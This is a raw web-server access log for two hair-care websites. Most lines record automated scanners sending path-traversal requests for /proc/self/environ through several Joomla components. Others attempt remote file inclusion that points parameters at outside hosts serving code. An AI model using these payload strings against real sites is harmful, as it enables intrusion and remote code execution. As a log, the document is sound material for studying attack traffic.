211.53.209.67 - - [21/Jun/2010:04:00:49 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
211.53.209.67 - - [21/Jun/2010:04:00:50 -0700] "GET /index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
211.53.209.67 - - [21/Jun/2010:04:00:51 -0700] "GET /logs/index2.php?option=com_gcalendar&vieww=gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:04:00:58 -0700] "GET /logs/access_100503.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:04:01:06 -0700] "GET /logs/access_100503.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:04:01:58 -0700] "GET /logs/access_100503.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:04:01:59 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:04:01:59 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:04:03:36 -0700] "GET /logs/access_100405.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
66.249.65.207 - - [21/Jun/2010:04:04:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3876 HTTP/1.1" 200 349 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
91.196.124.2 - - [21/Jun/2010:04:05:13 -0700] "GET /logs/access.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.196.124.2 - - [21/Jun/2010:04:05:13 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.196.124.2 - - [21/Jun/2010:04:05:13 -0700] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 200 6091 "-" "Mozilla/5.0" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:04:05:33 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:04:05:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:04:05:34 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
213.115.31.121 - - [21/Jun/2010:04:05:39 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
213.115.31.121 - - [21/Jun/2010:04:05:39 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
213.115.31.121 - - [21/Jun/2010:04:05:40 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:04:05:47 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:04:05:47 -0700] "GET /components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:04:05:48 -0700] "GET /logs//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.196.124.2 - - [21/Jun/2010:04:05:50 -0700] "GET /logs/access.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.196.124.2 - - [21/Jun/2010:04:05:50 -0700] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 200 6091 "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.196.124.2 - - [21/Jun/2010:04:05:50 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:04:06:59 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15167 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
188.40.96.137 - - [21/Jun/2010:04:10:08 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.96.137 - - [21/Jun/2010:04:10:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.96.137 - - [21/Jun/2010:04:10:09 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
66.249.65.198 - - [21/Jun/2010:04:10:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13286 HTTP/1.1" 200 349 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
188.40.232.234 - - [21/Jun/2010:04:13:30 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:04:13:30 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.232.234 - - [21/Jun/2010:04:13:31 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
95.215.0.123 - - [21/Jun/2010:04:16:04 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
95.215.0.123 - - [21/Jun/2010:04:16:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
95.215.0.123 - - [21/Jun/2010:04:16:04 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
95.215.0.123 - - [21/Jun/2010:04:16:08 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
95.215.0.123 - - [21/Jun/2010:04:16:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
95.215.0.123 - - [21/Jun/2010:04:16:09 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
174.120.217.47 - - [21/Jun/2010:04:16:10 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.120.217.47 - - [21/Jun/2010:04:16:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.120.217.47 - - [21/Jun/2010:04:16:10 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:04:16:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4794 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
174.120.217.47 - - [21/Jun/2010:04:16:13 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.120.217.47 - - [21/Jun/2010:04:16:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.120.217.47 - - [21/Jun/2010:04:16:14 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
66.249.65.237 - - [21/Jun/2010:04:16:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4037 HTTP/1.1" 200 349 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:04:17:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13228 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
188.40.232.234 - - [21/Jun/2010:04:17:45 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.232.234 - - [21/Jun/2010:04:17:46 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.232.234 - - [21/Jun/2010:04:17:46 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
204.152.200.50 - - [21/Jun/2010:04:18:14 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
204.152.200.50 - - [21/Jun/2010:04:18:14 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.40.96.137 - - [21/Jun/2010:04:19:56 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.96.137 - - [21/Jun/2010:04:19:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.96.137 - - [21/Jun/2010:04:19:57 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
213.115.31.121 - - [21/Jun/2010:04:20:14 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
213.115.31.121 - - [21/Jun/2010:04:20:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
213.115.31.121 - - [21/Jun/2010:04:20:14 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
91.196.124.2 - - [21/Jun/2010:04:21:18 -0700] "GET /logs/access_100125.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.196.124.2 - - [21/Jun/2010:04:21:50 -0700] "GET /logs/access_100125.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.249.65.234 - - [21/Jun/2010:04:22:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13738 HTTP/1.1" 200 349 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
91.196.124.2 - - [21/Jun/2010:04:23:36 -0700] "GET /logs/access.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.40.96.137 - - [21/Jun/2010:04:23:48 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.96.137 - - [21/Jun/2010:04:23:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.96.137 - - [21/Jun/2010:04:23:49 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:04:24:01 -0700] "GET //bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
91.196.124.2 - - [21/Jun/2010:04:24:04 -0700] "GET /logs/access.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.ahgoobaby.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.115.31.121 - - [21/Jun/2010:04:24:35 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
213.115.31.121 - - [21/Jun/2010:04:24:36 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
213.115.31.121 - - [21/Jun/2010:04:24:36 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:04:24:48 -0700] "GET /logs/access_100308.log///bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.232 - - [21/Jun/2010:04:24:49 -0700] "GET //bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.232 - - [21/Jun/2010:04:24:49 -0700] "GET /logs///bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:04:25:12 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
216.129.119.40 - - [21/Jun/2010:04:26:08 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
89.108.64.232 - - [21/Jun/2010:04:26:17 -0700] "GET //bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:04:27:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13741 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
216.129.119.41 - - [21/Jun/2010:04:27:16 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
89.238.72.218 - - [21/Jun/2010:04:29:04 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
66.249.65.216 - - [21/Jun/2010:04:29:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3330 HTTP/1.1" 200 349 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:04:30:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12624 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:04:33:54 -0700] "GET /logs/access_100222.log///bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:04:33:54 -0700] "GET //bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:04:33:55 -0700] "GET /logs///bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:04:36:01 -0700] "GET //bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
216.129.119.43 - - [21/Jun/2010:04:37:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
66.249.65.231 - - [21/Jun/2010:04:41:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13740 HTTP/1.1" 200 349 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:04:42:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14444 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:04:45:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=1197 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
89.108.64.232 - - [21/Jun/2010:04:48:10 -0700] "GET //bbs///delete_all.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
66.249.65.245 - - [21/Jun/2010:04:48:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15278 HTTP/1.1" 200 349 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
67.218.116.164 - - [21/Jun/2010:04:48:58 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:04:49:28 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:04:49:28 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:04:49:28 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:04:51:26 -0700] "POST /pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:04:51:26 -0700] "POST /logs/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:04:51:26 -0700] "POST /logs/access.log%20%20/pingserver.php HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:04:54:35 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12692 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:04:54:56 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:04:55:09 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.59.156.163 - - [21/Jun/2010:04:55:34 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.59.156.163 - - [21/Jun/2010:04:55:37 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [21/Jun/2010:05:00:17 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15240 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.181.94.229 - - [21/Jun/2010:05:02:19 -0700] "GET / HTTP/1.1" 200 926 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:05:03:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12539 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
195.22.10.103 - - [21/Jun/2010:05:06:32 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.22.10.103 - - [21/Jun/2010:05:06:33 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.22.10.103 - - [21/Jun/2010:05:07:24 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.22.10.103 - - [21/Jun/2010:05:07:43 -0700] "GET /logs/access.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.22.10.103 - - [21/Jun/2010:05:07:44 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.22.10.103 - - [21/Jun/2010:05:07:44 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.22.10.103 - - [21/Jun/2010:05:08:44 -0700] "GET /logs/access.log//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.22.10.103 - - [21/Jun/2010:05:08:44 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.22.10.103 - - [21/Jun/2010:05:08:45 -0700] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.28.0.233 - - [21/Jun/2010:05:09:59 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/8.00 (Windows NT 5.1; U; en)" "growlonghairfast.com"
195.28.0.233 - - [21/Jun/2010:05:09:59 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/8.00 (Windows NT 5.1; U; en)" "growlonghairfast.com"
195.22.10.103 - - [21/Jun/2010:05:10:02 -0700] "GET /logs/access_100201.log/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.22.10.103 - - [21/Jun/2010:05:10:02 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.22.10.103 - - [21/Jun/2010:05:10:03 -0700] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.22.10.103 - - [21/Jun/2010:05:11:30 -0700] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.22.10.103 - - [21/Jun/2010:05:11:30 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
